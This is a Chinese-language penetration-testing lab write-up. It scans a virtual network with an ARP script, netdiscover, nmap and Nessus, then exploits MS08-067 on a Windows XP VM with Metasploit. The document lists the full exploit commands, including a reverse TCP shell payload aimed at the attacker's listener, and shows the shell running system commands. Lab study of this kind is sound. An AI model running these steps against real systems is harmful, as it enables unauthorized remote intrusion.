利用 ms08_067 对 XP 进行渗透
文章目录
一、项目要求
- 渗透到 XP系统
- 在系统中执行几条命令
二、项目实施
1. 实施目标
- 使用工具寻找目标内存活的主机
- 使用工具,判断其操作系统,及相关信息收集
- 扫描该系统的漏洞,进行复现。
- 实验环境 (若实验过程中,出现没有写出工具,默认为kali 自带)
- nessus 8.10
- kali Linux 2019.1a
- windows xp sp3(目标主机)
- windows 7 (用于模仿真实环境)
2. 实施方案
2.1 扫描该网段存活的主机
已知该主机是内网的一个主机,并是xp系统,我们先使用arp脚本探测该主机内网,网段
root@fengzilin53:~# ./arping1.sh eth0
arp脚本内容
#!/bin/bash
if [ "$#" -ne 1 ];then #判断用户是否输入了至少一个参数如果没有输入参数,输出提示信息并退出
echo "Usage - ./arping.sh [interface]"
echo "Excample - ./arping.sh eth0"
echo "Example will perform an ARP scan of the local subnet to which eth0 is assigned"
exit
fi
interface=$1 #将用户输入的参数传递给 interface 变量
prefix=$(ifconfig $interface | grep "inet " | cut -d 't' -f 2 | cut -d '.' -f 1-3) #获取本机 IP地址网段 192.168.1
#对整个网段进行arping
for addr in $(seq 1 254);do
arping -c 1 $prefix.$addr | grep "bytes from" | cut -d" " -f 5 | cut -d "(" -f 2 | cut -d")" -f 1
done
使用arp脚本探测完目标网段,我们在使用netdiscover 探测存活的主机范围
root@fengzilin53:~# netdiscover -i eth0 -r 192.168.37.0/24
小结:
使用内网嗅探,无被发现
获得IP地址段为 :192.168.37.141-142
2.2 使用nmap 判断目标主机IP地址
root@fengzilin53:~# nmap -sS -O 192.168.37.140-142
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-05 17:12 CST
Nmap scan report for 192.168.37.141
Host is up (0.0061s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:08:54:7F (VMware)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
Nmap scan report for 192.168.37.142
Host is up (0.053s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
5357/tcp open wsdapi
10243/tcp open unknown
MAC Address: 00:0C:29:6E:D2:3B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone
Running: Microsoft Windows 2008|8.1|7|Phone|Vista
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (2 hosts up) scanned in 28.73 seconds
小结:
通过nmap 扫描该地址段获取信息判断
192.168.37.141 为XP 为目标主机,并且开放 端口为 135 ,139,445 系统版本为 Microsoft Windows XP SP2 or SP3
2.3 使用 nessus 扫描该系统漏洞
使用nessus的高级扫描
填写 ip地址
开启扫描
扫描结果有一个
发现有个漏洞 6个可执行的漏洞
是扫描出来了 MS08-067
2.4 使用 Metasploit 对 XP 进行渗透
2.4.1 在命令终端输入
root@fengzilin53:~# systemctl start postgresql.service //启动postgresql数据库
root@fengzilin53:~# systemctl enable postgresql //设置为开机自启
2.4.2 打开kali 在终端输入 以下,启动 Metasploit
root@fengzilin53:~# msfconsole
2.4.3 在命令终端 使用 search 命令 ,搜索该漏洞对应的模块
msf5 > search ms08_067
2.4.4 启动这渗透攻击模块查看基本信息并指定一个攻击载荷
msf5 > use exploit/windows/smb/ms08_067_netapi //进入渗透模块
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads //查看攻击载荷
msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp //设置攻击载荷
payload => generic/shell_reverse_tcp
2.4.5 完成渗透攻击模块与攻击载荷模块的选择之后,查看配置渗透攻击所需的配置选项
msf5 exploit(windows/smb/ms08_067_netapi) > show options
查看渗透攻击模块的攻击平台,这里支持60多种,不同的操作系统平台版本
2.4.6 上面我们扫描的系统为sp3 这里我们用34 中文简体
并设置对应的参数,这里37.138 为本机Kali IP地址
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.37.141 //目标IP地址 也就是XP
RHOST => 192.168.37.141
msf5 exploit(windows/smb/ms08_067_netapi) > set LPORT 4444 //这里回到控制主机的端口为 4444
LPORT => 4444
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.37.138 //本机IP 地址
LHOST => 192.168.37.138
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34 //目标系统类型为 34号
target => 34
2.4.7 查看设置的值,是否正确
msf5 exploit(windows/smb/ms08_067_netapi) > show options
2.4.8 使用 run 命令发起渗透攻击
2.4.9 出现这个成功拿取权限 并执行 ipconfig
命令查看该IP地址
//若出现乱码,将终端的兼容性,改为 GBK 即可
C:\WINDOWS\system32>
执行shell命令查看系统信息 systeminfo
三、总结
-
本章 运用了 从主机发现,到信息搜集,在渗透拿权,从无到有,一步一步渗透到系统内,这也是渗透的基本思路
-
总结一下,
Metasploit
的思路 如图